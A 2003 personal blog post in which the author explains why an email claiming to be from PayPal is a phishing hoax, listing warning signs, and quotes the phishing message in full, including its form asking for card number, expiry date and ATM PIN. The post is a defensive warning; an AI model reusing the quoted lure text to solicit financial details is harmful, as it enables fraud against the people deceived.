John C. Kirk (johnckirk) wrote,
John C. Kirk

PayPal hoax

Hmm, I wasn't intending to post another entry this soon, but I just got a rather worrying email. It appears to be from PayPal, but I think it's a hoax, so be very cautious if you receive something similar.

Key things that made me suspicious:

  • They are asking for my password, which PayPal say they will never do.

  • They shouldn't need my credit card number again, and giving a random person the number/expiration date would make it very easy for them to commit fraud (they could get my street address by logging into PayPal as me, once they have my email address and password).

  • They definitely shouldn't need my ATM PIN!

  • Although the email is dated tomorrow (Wed 4th June 2003), it says that it expires May 31, 2003.

  • General point - if I'm going to enter stuff like this, I'd rather do it at the website, than typing into an email form.

Once I got suspicious, I checked the source code of the message - although it appears to be from (according to the "from" email address), the form is set up to send its data to And even if they are a registered subcontractor, a file called "boyz.php" doesn't sound very official to me. And finally, this email was sent to my old Demon address, rather than my new address (which is actually registered with PayPal, so the one that they'll use to contact me) - presumably this means that it's a wide scale thing, rather than anything that's specifically targetted at PayPal users.

Anyway, I've notified PayPal of this, and they should get back to me in a couple of days to confirm/deny.

So, assuming that I'm right, it's good to know that I'm getting less gulllible as time goes by. In this case, I think it helps that we covered social engineering as part of the Cryptography/Information Security course, which I was revising a couple of weeks ago.

Oh, and one last thing - I've included the entire email below (behind the cut tags), so that you can see it for yourselves. This should be obvious, but please don't enter your details and click the "log in" button!


Dear PayPal Customer


This e-mail is the notification of recent innovations taken by PayPal to detect inactive customers and non-functioning mailboxes.

The inactive customers are subject to restriction and removal in the next
3 months.

Please confirm your email address and and Credit Card info
number by logging in to your PayPal account
using the form below:


Email Address:
Full Name #: 
Credit Card #: 
Exp.Date(mm/yyyy) #: 
ATM PIN (For Bank Verification) #: 

This notification expires May 31, 2003

Thanks for using PayPal!

Tags: computers, paypal, scam, security

  • Comics clearout

    I'm having another clearout of old comics. These are all now available in digital format (Marvel Unlimited and/or Comixology) so I no longer need the…

  • Comics clearout

    I'm having another clearout of old comics, mostly from the 1990s. These are all now available in digital format (either on Marvel Unlimited or…

  • 2000AD: Trifecta

    I've been reading comics for a long time. I started out with the Beano when I was very young (maybe 5 years old?) then I moved onto the Eagle when I…

  • Post a new comment


    Anonymous comments are disabled in this journal

    default userpic

    Your reply will be screened

    Your IP address will be recorded